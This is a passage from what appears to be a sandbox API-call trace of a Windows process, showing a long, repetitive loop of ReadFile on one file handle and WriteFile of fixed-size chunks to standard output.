0x1 [0143.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.904] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.905] GetFileType (hFile=0x4c) returned 0x1 [0143.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.905] GetFileType (hFile=0x4c) returned 0x1 [0143.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.905] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.906] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.906] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.906] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.907] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.907] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.907] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.908] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.908] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.908] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] GetFileType (hFile=0x4c) returned 0x1 [0143.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.909] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.909] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.910] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] GetFileType (hFile=0x4c) returned 0x1 [0143.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.910] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.910] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.911] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] GetFileType (hFile=0x4c) returned 0x1 [0143.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.911] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.912] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.912] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef460*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef460*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef4b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef4b0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef500*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef500*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.912] GetFileType (hFile=0x4c) returned 0x1 [0143.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef550*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef550*, lpNumberOfBytesWritten=0x2ee554*=0x20, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.913] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee540 | out: lpNewFilePointer=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0143.913] ReadFile (in: hFile=0x54, lpBuffer=0x2ef370, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee560, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesRead=0x2ee560*=0x200, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef370*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef370*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef3c0*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] GetFileType (hFile=0x4c) returned 0x1 [0143.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0143.913] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef410*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee554, lpOverlapped=0x0 | out: lpBuffer=0x2ef410*, lpNumberOfBytesWritten=0x2ee554*=0x50, lpOverlapped=0x0) returned 1 [0143.913] _get_osfhandle 